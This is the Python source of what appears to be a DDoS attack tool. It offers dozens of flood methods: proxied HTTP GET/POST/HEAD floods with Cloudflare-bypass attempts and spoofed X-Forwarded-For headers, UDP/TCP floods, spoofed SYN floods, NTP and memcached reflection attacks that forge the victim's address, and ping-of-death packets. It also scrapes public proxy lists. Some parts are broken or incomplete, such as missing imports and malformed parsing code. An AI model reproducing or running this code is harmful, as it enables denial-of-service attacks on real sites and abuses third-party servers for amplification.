#!/usr/bin/env python3 # -*- coding: utf-8 -*- l7 = ["CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "OSTRESS", "DYN", "SLOW", "HEAD", "HIT", "NULL", "COOKIE", "BRUST", "PPS", "EVEN", "GSB", "DGB", "AVB"] l4 = ["TCP", "UDP", "SYN", "VSE", "MEM", "NTP"] l3 = ["POD", "ICMP"] to = ["CFIP", "DNS", "PING", "CHECK", "DSTAT", "INFO"] ot = ["STOP", "TOOLS", "HELP"] methods = l7 + l4 + l3 methodsl = l7 + l4 + l3 + to + ot def spoofer(): addr = [192, 168, 0, 1] d = '.' addr[0] = str(random.randrange(11, 197)) addr[1] = str(random.randrange(0, 255)) addr[2] = str(random.randrange(0, 255)) addr[3] = str(random.randrange(2, 254)) assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3] return assemebled def start_attack(method, threads, event, socks_type): global out_file # layer7 cmethod = str(method.upper()) if (cmethod != "HIT") and (cmethod not in l4) and (cmethod not in l3) and (cmethod != "OSTRESS"): out_file = str("files/proxys/" + sys.argv[5]) proxydl(out_file, socks_type) print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ".format(method, target, port, sys.argv[7],len(proxies), str(nums))) else: print("{} Attack Started To {}:{} For {} Seconds".format(method, target, port, sys.argv[7])) try: if method == "post": for _ in range(threads): threading.Thread(target=post, args=(event, socks_type), daemon=True).start() elif method == "brust": for _ in range(threads): threading.Thread(target=brust, args=(event, socks_type), daemon=True).start() elif method == "get": for _ in range(threads): threading.Thread(target=http, args=(event, socks_type), daemon=True).start() elif method == "pps": for _ in range(threads): threading.Thread(target=pps, args=(event, socks_type), daemon=True).start() elif method == "even": for _ in range(threads): threading.Thread(target=even, args=(event, socks_type), daemon=True).start() elif method == "ovh": for _ in range(threads): threading.Thread(target=ovh, args=(event, socks_type), daemon=True).start() elif method == "capb": for _ in range(threads): threading.Thread(target=capb, args=(event, socks_type), daemon=True).start() elif method == "cookie": for _ in range(threads): threading.Thread(target=cookie, args=(event, socks_type), daemon=True).start() elif method == "tor": for _ in range(threads): threading.Thread(target=tor, args=(event, socks_type), daemon=True).start() elif method == "bypass": for _ in range(threads): threading.Thread(target=bypass, args=(event, socks_type), daemon=True).start() elif method == "head": for _ in range(threads): threading.Thread(target=head, args=(event, socks_type), daemon=True).start() elif method == "stress": for _ in range(threads): threading.Thread(target=stress, args=(event, socks_type), daemon=True).start() elif method == "ostress": for _ in range(threads): threading.Thread(target=ostress, args=(event, socks_type), daemon=True).start() elif method == "null": for _ in range(threads): threading.Thread(target=null, args=(event, socks_type), daemon=True).start() elif method == "cfb": for _ in range(threads): threading.Thread(target=cfb, args=(event, socks_type), daemon=True).start() elif method == "avb": for _ in range(threads): threading.Thread(target=AVB, args=(event, socks_type), daemon=True).start() elif method == "gsb": for _ in range(threads): threading.Thread(target=gsb, args=(event, socks_type), daemon=True).start() elif method == "dgb": for _ in range(threads): threading.Thread(target=dgb, args=(event, socks_type), daemon=True).start() elif method == "dyn": for _ in range(threads): threading.Thread(target=dyn, args=(event, socks_type), daemon=True).start() elif method == "hit": for _ in range(threads): threading.Thread(target=hit, args=(event, timer), daemon=True).start() # layer4 elif method == "vse": for _ in range(threads): threading.Thread(target=vse, args=(event, timer), daemon=True).start() elif method == "udp": for _ in range(threads): threading.Thread(target=udp, args=(event, timer), daemon=True).start() elif method == "tcp": for _ in range(threads): threading.Thread(target=tcp, args=(event, timer), daemon=True).start() elif method == "syn": for _ in range(threads): threading.Thread(target=syn, args=(event, timer), daemon=True).start() elif method == "mem": for _ in range(threads): threading.Thread(target=mem, args=(event, timer), daemon=True).start() elif method == "ntp": for _ in range(threads): threading.Thread(target=ntp, args=(event, timer), daemon=True).start() # layer3 elif method == "icmp": for _ in range(threads): threading.Thread(target=icmp, args=(event, timer), daemon=True).start() elif method == "pod": for _ in range(threads): threading.Thread(target=pod, args=(event, timer), daemon=True).start() except: pass def random_data(): return str(Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice( strings) + Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice( strings)) def Headers(method): header = "" if method == "get" or method == "head": connection = "Connection: Keep-Alive\r\n" accept = Choice(acceptall) + "\r\n" referer = "Referer: " + referers + target + path + "\r\n" connection += "Cache-Control: max-age=0\r\n" connection += "pragma: no-cache\r\n" connection += "X-Forwarded-For: " + spoofer() + "\r\n" useragent = "User-Agent: " + UserAgent + "\r\n" header = referer + useragent + accept + connection + "\r\n\r\n" elif method == "cookie": connection = "Connection: Keep-Alive\r\n" more = "cache-control: no-cache\r\n" parm = "pragma: no-cache\r\n" up = "upgrade-insecure-requests: 1" connection += "Cookies: " + str(secrets.token_urlsafe(16)) + "\r\n" accept = Choice(acceptall) + "\r\n" referer = "Referer: " + referers + target + path + "\r\n" useragent = "User-Agent: " + UserAgent + "\r\n" header = referer + useragent + accept + connection + more + up + parm + "\r\n\r\n" elif method == "brust": connection = "Connection: Keep-Alive\r\n" more = "Cache-Control: max-age=0\r\n" more2 = "Via: 1.0 PROXY\r\n" proxyd = str(proxy) xfor = "X-Forwarded-For: " + proxyd + "\r\n" accept = "Accept: */*\r\n" referer = "Referer: " + referers + target + path + "\r\n" useragent = "User-Agent: " + UserAgent + "\r\n" header = referer + useragent + accept + connection + more + xfor + more2 + "\r\n\r\n" elif method == "even": up = "Upgrade-Insecure-Requests: 1\r\n" referer = "Referer: " + referers + target + path + "\r\n" useragent = "User-Agent: " + UserAgent + "\r\n" proxyd = str(proxy) xfor = "X-Forwarded-For: " + proxyd + "\r\n" header = referer + useragent + up + xfor + "\r\n\r\n" elif method == "ovh": accept = Choice(acceptall) + "\r\n" more = "Connection: keep-alive\r\n" connection = "Cache-Control: max-age=0\r\n" connection += "pragma: no-cache\r\n" connection += "X-Forwarded-For: " + spoofer() + "\r\n" up = "Upgrade-Insecure-Requests: 1\r\n" useragent = "User-Agent: " + UserAgent + "\r\n" header = useragent + more + accept + up + "\r\n\r\n" elif method == "pps": header = "GET / HTTP/1.1\r\n\r\n" elif method == "dyn": connection = "Connection: Keep-Alive\r\n" accept = Choice(acceptall) + "\r\n" connection += "Cache-Control: max-age=0\r\n" connection += "pragma: no-cache\r\n" connection += "X-Forwarded-For: " + spoofer() + "\r\n" referer = "Referer: " + referers + target + path + "\r\n" useragent = "User-Agent: " + UserAgent + "\r\n" header = referer + useragent + accept + connection + "\r\n\r\n" elif method == "socket": header = "" elif method == "null": connection = "Connection: null\r\n" accept = Choice(acceptall) + "\r\n" connection += "Cache-Control: max-age=0\r\n" connection += "pragma: no-cache\r\n" connection += "X-Forwarded-For: " + spoofer() + "\r\n" referer = "Referer: null\r\n" useragent = "User-Agent: null\r\n" header = referer + useragent + accept + connection + "\r\n\r\n" elif method == "post": post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n" refer = "Referer: http://" + target + path + "\r\n" user_agent = "User-Agent: " + UserAgent + "\r\n" accept = Choice(acceptall) + "\r\n" connection = "Cache-Control: max-age=0\r\n" connection += "pragma: no-cache\r\n" connection += "X-Forwarded-For: " + spoofer() + "\r\n" data = str(random._urandom(8)) length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n" header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" elif method == "hit": post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n" refer = "Referer: http://" + target + path + "\r\n" user_agent = "User-Agent: " + UserAgent + "\r\n" connection = "Cache-Control: max-age=0\r\n" connection += "pragma: no-cache\r\n" connection += "X-Forwarded-For: " + spoofer() + "\r\n" accept = Choice(acceptall) + "\r\n" data = str(random._urandom(8)) length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n" header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" return header def UrlFixer(original_url): global target, path, port, protocol original_url = original_url.strip() url = "" path = "/" port = 80 protocol = "http" if original_url[:7] == "http://": url = original_url[7:] elif original_url[:8] == "https://": url = original_url[8:] protocol = "https" tmp = url.split("/") website = tmp[0] check = website.split(":") if len(check) != 1: port = int(check[1]) else: if protocol == "https": port = 443 target = check[0] if len(tmp) > 1: path = url.replace(website, "", 1) def udp(event, timer): event.wait() while time.time() < timer: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: for _ in range(multiple): data = random._urandom(int(Intn(64, 1500))) s.sendto(data, (str(target), int(port))) except: s.close() except: s.close() def icmp(event, timer): event.wait() while time.time() < timer: try: for _ in range(multiple): packet = random._urandom(int(Intn(64, 1500))) pig(target, count=10, interval=0.2, payload_size=len(packet), payload=packet) except: pass ntp_payload = "\x17\x00\x03\x2a" + "\x00" * 4 def ntp(event, timer): packets = Intn(10, 150) server = Choice(ntpsv) event.wait() while time.time() < timer: try: packet = ( IP(dst=server, src=target) / UDP(sport=Intn(2000, 65535), dport=int(port)) / Raw(load=ntp_payload) ) try: for _ in range(multiple): send(packet, count=packets, verbose=False) except: pass except: pass mem_payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" def mem(event, timer): packets = Intn(10, 150) server = Choice(memsv) event.wait() while time.time() < timer: try: try: packet = ( IP(dst=server, src=target) / UDP(sport=port, dport=11211) / Raw(load=mem_payload) ) for _ in range(multiple): send(packet, count=packets, verbose=False) except: pass except: pass def tcp(event, timer): event.wait() while time.time() < timer: try: data = random._urandom(int(Intn(1024, 65535))) address = (str(target), int(port)) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(address) for _ in range(multiple): s.send(data) except: s.close() except: s.close() class DNSQuery: def __init__(self, data): self.data = data self.dominio = '' self.DnsType = '' HDNS=data[-4:-2].encode("hex") if HDNS == "0001": self.DnsType='A' elif HDNS == "000f": self.DnsType='MX' elif HDNS == "0002": self.DnsType='NS' elif HDNS == "0010": self.DnsType="TXT" else: self.DnsType="Unknown" tipo = (ord(data[2]) >> 3) & 15 # Opcode bits if tipo == 0: # Standard query ini=12 lon=ord(data[ini]) while lon != 0: self.dominio+=data[ini+1:ini+lon+1]+'.' ini+=lon+1 lon=ord(data[ini]) def respuesta(self, ip): packet='' if self.dominio: packet+=self.data[:2] + "\x81\x80" packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts packet+=self.data[12:] # Original Domain Name Question packet+='\xc0\x0c' # Pointer to domain name packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP return packet def dns(event, timer): event.wait() while time.time() < timer: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.bind(('',53)) data, addr = s.recvfrom(1024) p = DNSQuery(data) for _ in range(multiple): s.sendto(p.respuesta(target), addr) except: s.close() def syn(event, timer): event.wait() while time.time() < timer: try: IP_Packet = IP () IP_Packet.src = randomIP() IP_Packet.dst = target TCP_Packet = TCP () TCP_Packet.sport = randint(1, 65535) TCP_Packet.dport = int(port) TCP_Packet.flags = "S" TCP_Packet.seq = randint(1000, 9000) TCP_Packet.window = randint(1000, 9000) for _ in range(multiple): send(IP_Packet/TCP_Packet, verbose=0) except: pass def pod(event, timer): event.wait() while time.time() < timer: try: rand_addr = spoofer() ip_hdr = IP(src=rand_addr, dst=target) packet = ip_hdr / ICMP() / ("m" * 65535) send(packet) except: pass def stop(): print('All Attacks Stopped !') os.system('pkill python*') exit() def dyn(event, socks_type): header = Headers("dyn") proxy = Choice(proxies).strip().split(":") get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + random_data() + "." + target + "\r\n" request = get_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def http(event, socks_type): header = Headers("get") proxy = Choice(proxies).strip().split(":") get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" request = get_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def capb(event, socks_type): header = Headers("get") proxy = Choice(proxies).strip().split(":") get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" request = get_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def ovh(event, socks_type): header = Headers("ovh") proxy = Choice(proxies).strip().split(":") get_host = "HEAD " + path + "/" + str(Intn(1111111111, 9999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n" request = get_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def pps(event, socks_type): proxy = Choice(proxies).strip().split(":") request = Headers("pps") event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def even(event, socks_type): global proxy proxy = Choice(proxies).strip().split(":") header = Headers("even") get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" request = get_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def brust(event, socks_type): global proxy proxy = Choice(proxies).strip().split(":") header = Headers("brust") get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" request = get_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def cookie(event, socks_type): proxy = Choice(proxies).strip().split(":") header = Headers("cookie") get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" request = get_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def cfb(event, socks_type): header = Headers("get") proxy = Choice(proxies).strip().split(":") get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n" request = get_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) cfscrape.create_scraper(sess=s) try: for _ in range(multiple): s.sendall(str.encode(request)) except: s.close() except: s.close() # def tor(event, socks_type): # event.wait() # while time.time() < timer: # with tor_requests_session() as s: # s.get(sys.argv[2]) def AVB(event, socks_type): proxy = Choice(proxies).strip().split(":") event.wait() payload = str(random._urandom(64)) while time.time() < timer: try: s = cfscrape.create_scraper() if socks_type == 5 or socks_type == 4: s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) if socks_type == 1: s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1]) s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1]) if protocol == "https": s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" try: for _ in range(multiple): s.post(sys.argv[2], timeout=1, data=payload) except: s.close() except: s.close() def bypass(event, socks_type): proxy = Choice(proxies).strip().split(":") event.wait() payload = str(random._urandom(64)) while time.time() < timer: try: s = requests.Session() if socks_type == 5 or socks_type == 4: s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) if socks_type == 1: s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1]) s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1]) if protocol == "https": s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" try: for _ in range(multiple): s.post(sys.argv[2], timeout=1, data=payload) except: s.close() except: s.close() def dgb(event, socks_type): proxy = Choice(proxies).strip().split(":") event.wait() while time.time() < timer: try: s = cfscrape.create_scraper() if socks_type == 5 or socks_type == 4: s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) if socks_type == 1: s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1]) s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1]) if protocol == "https": s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" try: sleep(5) for _ in range(multiple): s.get(sys.argv[2]) except: s.close() except: s.close() def head(event, socks_type): proxy = Choice(proxies).strip().split(":") header = Headers("head") head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n" request = head_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def null(event, socks_type): proxy = Choice(proxies).strip().split(":") header = Headers("null") head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n" request = head_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def gsb(event, socks_type): proxy = Choice(proxies).strip().split(":") header = Headers("head") head_host = "HEAD " + path + "?q=" + str(Intn(000000000, 999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n" request = head_host + header event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: sleep(5) for _ in range(multiple): s.send(str.encode(request)) except: s.close() except: s.close() def hit(event, timer): global s request = Headers("hit") event.wait() while time.time() < timer: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((str(target), int(port))) try: for _ in range(multiple): s.sendall(str.encode(request)) except: s.close() except: s.close() def cfbc(event, socks_type): request = Headers("cfb") event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.sendall(str.encode(request)) except: s.close() except: s.close() def post(event, socks_type): request = Headers("post") proxy = Choice(proxies).strip().split(":") event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.sendall(str.encode(request)) except: s.close() except: s.close() def stress(event, socks_type): request = Headers("stress") proxy = Choice(proxies).strip().split(":") event.wait() while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) try: for _ in range(multiple): s.sendall(str.encode(request)) except: s.close() except: s.close() def ostress(event, timer): request = Headers("stress") event.wait() while time.time() < timer: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((str(target), int(port))) try: for _ in range(multiple): s.sendall(str.encode(request)) except: s.close() except: s.close() socket_list = [] t = 0 def slow(conn, socks_type): global t proxy = Choice(proxies).strip().split(":") get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" header = Headers("get") request = get_host + header while time.time() < timer: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) for _ in range(conn): try: s.send(request) * conn t += 1 sys.stdout.write("Connections = " + t + "\r") sys.stdout.flush() except: s.close() proxy = Choice(proxies).strip().split(":") except: s.close() proxy = Choice(proxies).strip().split(":") def checking(lines, socks_type, ms): global nums, proxies proxy = lines.strip().split(":") if len(proxy) != 2: proxies.remove(lines) return err = 0 while True: if err == 3: proxies.remove(lines) break try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if socks_type == 1: s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) s.settimeout(ms) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s, server_hostname=target) s.send(str.encode("GET / HTTP/1.1\r\n\r\n")) s.close() break except: err += 1 nums += 1 nums = 0 def check_socks(ms): global nums thread_list = [] for lines in list(proxies): if choice == "5": th = threading.Thread(target=checking, args=(lines, 5, ms,)) th.start() if choice == "4": th = threading.Thread(target=checking, args=(lines, 4, ms,)) th.start() if choice == "1": th = threading.Thread(target=checking, args=(lines, 1, ms,)) th.start() thread_list.append(th) sleep(0.01) for th in list(thread_list): th.join() ans = "y" if ans == "y" or ans == "": if choice == "4": with open(out_file, 'wb') as fp: for lines in list(proxies): fp.write(bytes(lines, encoding='utf8')) fp.close() elif choice == "5": with open(out_file, 'wb') as fp: for lines in list(proxies): fp.write(bytes(lines, encoding='utf8')) fp.close() elif choice == "1": with open(out_file, 'wb') as fp: for lines in list(proxies): fp.write(bytes(lines, encoding='utf8')) fp.close() def check_list(socks_file): temp = open(socks_file).readlines() temp_list = [] for i in temp: if i not in temp_list: if ':' in i: temp_list.append(i) rfile = open(socks_file, "wb") for i in list(temp_list): rfile.write(bytes(i, encoding='utf-8')) rfile.close() def downloadsocks(choice): global out_file if choice == "4": f = open(out_file, 'wb') try: r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all", timeout=5) f.write(r.content) except: pass try: r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4", timeout=5) f.write(r.content) except: pass try: r = requests.get("https://www.proxyscan.io/download?type=socks4", timeout=5) f.write(r.content) except: pass try: r = requests.get( "https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=socks4&lastchecked=60", timeout=5) f.write(r.content) except: pass try: r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt", timeout=5) f.write(r.content) f.close() except: f.close() try: req = requests.get("https://www.socks-proxy.net/", timeout=5, headers={"User-Agent", UserAgent}).text part = str(req) part = part.split("") part = part[1].split("") part = part[0].split("") proxies = "" for proxy in part: proxy = proxy.split("") try: proxies = proxies + proxy[0] + ":" + proxy[1] + "\n" except: pass out_file = open(out_file, "a") out_file.write(proxies) out_file.close() except: pass if choice == "5": f = open(out_file, 'wb') try: r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all", timeout=5) f.write(r.content) except: pass try: r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5", timeout=5) f.write(r.content) f.close() except: pass try: r = requests.get("https://www.proxyscan.io/download?type=socks5", timeout=5) f.write(r.content) f.close() except: pass try: r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt", timeout=5) f.write(r.content) except: pass 